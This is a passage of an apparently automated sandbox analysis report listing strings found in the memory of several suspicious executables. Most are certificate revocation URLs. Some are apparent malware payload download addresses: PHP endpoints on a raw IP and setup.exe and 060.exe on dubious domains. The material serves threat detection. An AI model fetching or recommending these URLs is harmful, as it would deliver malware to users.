                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/getimage12.phpUV
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.00000000040F9000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/retail.php
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.00000000040F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/retail.php.
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/retail.phphp
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1495494393.0000000004130000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/space.php
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507524439.0000000002AE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/space.php(
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/space.php4W
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/space.php8W
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/space.php=W
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/space.phpA3
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.00000000040F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/space.phpj
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                        Source: t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                        Source: t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                        Source: t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                        Source: file.exe, 00000000.00000002.1323600743.0000027F39071000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1326287625.0000027F49071000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1323600743.0000027F3A57C000.00000004.00001000.00020000.00000000.sdmp, VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.0000000007353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dod.fastbutters.com:80/style/060.exe
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dod.fastbutters.com:80/style/060.exeEQ
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447491375.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445863210.0000000002AD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dod.fastbutters.com:80/style/060.exeG
                        Source: u5v8.0.exe, 0000000A.00000003.1500584438.0000000004307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: u5v8.0.exe, 0000000A.00000003.1500584438.0000000004307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: u5v8.0.exe, 0000000A.00000003.1500584438.0000000004307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1374404248.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000003.1861206412.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, wr6XLbv7Ijp4TImjm1ouF4U2.exe, 0000001E.00000002.1881705606.0000000140001000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: https://ipinfo.io/namehttps://ipgeolocation.io/status
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B20000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.0000000004114000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.0000000004114000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1495494393.0000000004130000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/525403/setup.exe
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/525403/setup.exeEV
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/525403/setup.exehic
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/525403/setup.exes
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1454114356.0000000004130000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1485462188.0000000004130000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1458630982.0000000004130000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.0000000004114000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.0000000004114000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1495494393.0000000004130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/525403/setup.exes.#
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/525403/setup.exexemQ
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com/IV
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.00000000040F9000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com:80/525403/setup.exe
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1435218674.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1434784315.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://monoblocked.com:80/525403/setup.exemQ
